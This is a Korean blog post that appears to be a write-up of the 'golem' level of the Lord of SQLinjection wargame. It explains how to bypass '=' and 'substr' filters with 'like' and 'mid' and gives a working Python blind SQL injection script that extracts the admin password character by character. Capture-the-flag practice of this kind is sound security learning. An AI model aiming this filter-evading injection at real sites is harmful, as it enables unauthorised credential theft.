본문 바로가기
Security/WebHacking

[Load of SQLinjection][LOS] 문제풀이 golem

by J0DEV 2021. 8. 12.
반응형

LOS 11번 문제 GOLEM

 

 

substr, = 등 다 필터링한다

= 은 like 쓰면되고 substr은 right 또는 mid를 쓰면 된다.

 

 

우선 length로 pw 길이를 알아낸다.

 

그 후 코딩 

import requests

length=8
url="https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php"

header = {'cookie' : 'PHPSESSID='}

for i in range(1,9):
    for j in range(48, 128):
        sub_url = "?pw="+"1' || id like 'admin' %26%26 mid(pw,"+str(i)+",1) like'"+chr(j)
        query = url+sub_url
        req = requests.post(url=query, headers=header)
        if "Hello admin" in req.text:
            print(chr(j))
            break

 

 

 

 

반응형
저작자표시 비영리 변경금지

'Security > WebHacking' 카테고리의 다른 글

[Load of SQLinjection][LOS] 문제풀이 skeleton  (0) 2021.08.12
[Load of SQLinjection][LOS] 문제풀이 vampire  (0) 2021.08.12
[Load of SQLinjection][LOS] 문제풀이 troll  (0) 2021.08.12
[Load of SQLinjection][LOS] 문제풀이 orge  (0) 2021.08.12
[Load of SQLinjection][LOS] 문제풀이 darkelf  (0) 2021.08.12

관련글

티스토리툴바